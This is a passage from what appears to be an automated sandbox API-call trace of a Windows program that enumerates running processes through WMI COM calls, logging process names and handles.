[0265.360] WbemDefPath:IUnknown:Release (This=0x552a708) returned 0x2 [0265.360] WbemDefPath:IWbemPath:SetText (This=0x552a708, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4360\"") returned 0x0 [0265.360] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.360] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.360] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.360] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.360] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.360] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.360] IWbemClassObject:Get (in: This=0x552b9d8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e4f60*=0, plFlavor=0x23e4f64*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="stocklastmiddle.exe", varVal2=0x0), pType=0x23e4f60*=8, plFlavor=0x23e4f64*=0) returned 0x0 [0265.360] SysStringByteLen (bstr="stocklastmiddle.exe") returned 0x26 [0265.360] SysStringByteLen (bstr="stocklastmiddle.exe") returned 0x26 [0265.360] IWbemClassObject:Get (in: This=0x552b9d8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e4f60*=8, plFlavor=0x23e4f64*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="stocklastmiddle.exe", varVal2=0x0), pType=0x23e4f60*=8, plFlavor=0x23e4f64*=0) returned 0x0 [0265.361] SysStringByteLen (bstr="stocklastmiddle.exe") returned 0x26 [0265.361] SysStringByteLen (bstr="stocklastmiddle.exe") returned 0x26 [0265.361] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.361] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x552bb70, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.362] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552bb70) returned 0x0 [0265.362] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.362] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.362] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.362] IUnknown:AddRef (This=0x552bb70) returned 0x3 [0265.362] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.362] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.363] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552bb74) returned 0x0 [0265.363] IMarshal:GetUnmarshalClass (in: This=0x552bb74, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.363] IUnknown:Release (This=0x552bb74) returned 0x3 [0265.363] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.363] IUnknown:Release (This=0x552bb70) returned 0x2 [0265.363] IUnknown:QueryInterface (in: This=0x552bb70, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552bb70) returned 0x0 [0265.363] IUnknown:AddRef (This=0x552bb70) returned 0x4 [0265.363] IUnknown:Release (This=0x552bb70) returned 0x3 [0265.363] IUnknown:Release (This=0x552bb70) returned 0x2 [0265.363] CoTaskMemFree (pv=0x54ba398) [0265.363] IUnknown:AddRef (This=0x552bb70) returned 0x3 [0265.363] IWbemClassObject:Get (in: This=0x552bb70, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.363] IWbemClassObject:Get (in: This=0x552bb70, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4368\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.364] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4368\"") returned 0x5e [0265.364] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4368\"") returned 0x5e [0265.364] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.364] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.364] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.364] IUnknown:Release (This=0x601a94) returned 0x1 [0265.365] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.365] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a778) returned 0x0 [0265.365] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a778) returned 0x0 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.365] WbemDefPath:IUnknown:AddRef (This=0x552a778) returned 0x3 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.365] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537c90) returned 0x0 [0265.365] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537c90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.366] WbemDefPath:IUnknown:Release (This=0x5537c90) returned 0x3 [0265.366] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.366] WbemDefPath:IUnknown:Release (This=0x552a778) returned 0x2 [0265.366] WbemDefPath:IUnknown:Release (This=0x552a778) returned 0x1 [0265.366] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a778, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a778) returned 0x0 [0265.366] WbemDefPath:IUnknown:AddRef (This=0x552a778) returned 0x3 [0265.366] WbemDefPath:IUnknown:Release (This=0x552a778) returned 0x2 [0265.366] WbemDefPath:IWbemPath:SetText (This=0x552a778, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4368\"") returned 0x0 [0265.366] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.366] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.367] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.367] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.367] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.367] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.367] IWbemClassObject:Get (in: This=0x552bb70, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e580c*=0, plFlavor=0x23e5810*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whom_only.exe", varVal2=0x0), pType=0x23e580c*=8, plFlavor=0x23e5810*=0) returned 0x0 [0265.367] SysStringByteLen (bstr="whom_only.exe") returned 0x1a [0265.367] SysStringByteLen (bstr="whom_only.exe") returned 0x1a [0265.367] IWbemClassObject:Get (in: This=0x552bb70, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e580c*=8, plFlavor=0x23e5810*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whom_only.exe", varVal2=0x0), pType=0x23e580c*=8, plFlavor=0x23e5810*=0) returned 0x0 [0265.367] SysStringByteLen (bstr="whom_only.exe") returned 0x1a [0265.367] SysStringByteLen (bstr="whom_only.exe") returned 0x1a [0265.367] CoTaskMemAlloc (cb=0x4) returned 0x54ba1d8 [0265.367] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba1d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba1d8*=0x552bd08, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552bd08) returned 0x0 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.368] IUnknown:AddRef (This=0x552bd08) returned 0x3 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.368] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552bd0c) returned 0x0 [0265.368] IMarshal:GetUnmarshalClass (in: This=0x552bd0c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.368] IUnknown:Release (This=0x552bd0c) returned 0x3 [0265.369] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.369] IUnknown:Release (This=0x552bd08) returned 0x2 [0265.369] IUnknown:QueryInterface (in: This=0x552bd08, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552bd08) returned 0x0 [0265.369] IUnknown:AddRef (This=0x552bd08) returned 0x4 [0265.369] IUnknown:Release (This=0x552bd08) returned 0x3 [0265.369] IUnknown:Release (This=0x552bd08) returned 0x2 [0265.369] CoTaskMemFree (pv=0x54ba1d8) [0265.369] IUnknown:AddRef (This=0x552bd08) returned 0x3 [0265.369] IWbemClassObject:Get (in: This=0x552bd08, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.369] IWbemClassObject:Get (in: This=0x552bd08, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4376\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.369] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4376\"") returned 0x5e [0265.369] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4376\"") returned 0x5e [0265.369] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.369] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.369] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.370] IUnknown:Release (This=0x601a94) returned 0x1 [0265.370] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0265.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.371] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a388) returned 0x0 [0265.371] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0265.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a388) returned 0x0 [0265.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.371] WbemDefPath:IUnknown:AddRef (This=0x552a388) returned 0x3 [0265.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a388, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537fc0) returned 0x0 [0265.371] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537fc0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.371] WbemDefPath:IUnknown:Release (This=0x5537fc0) returned 0x3 [0265.372] 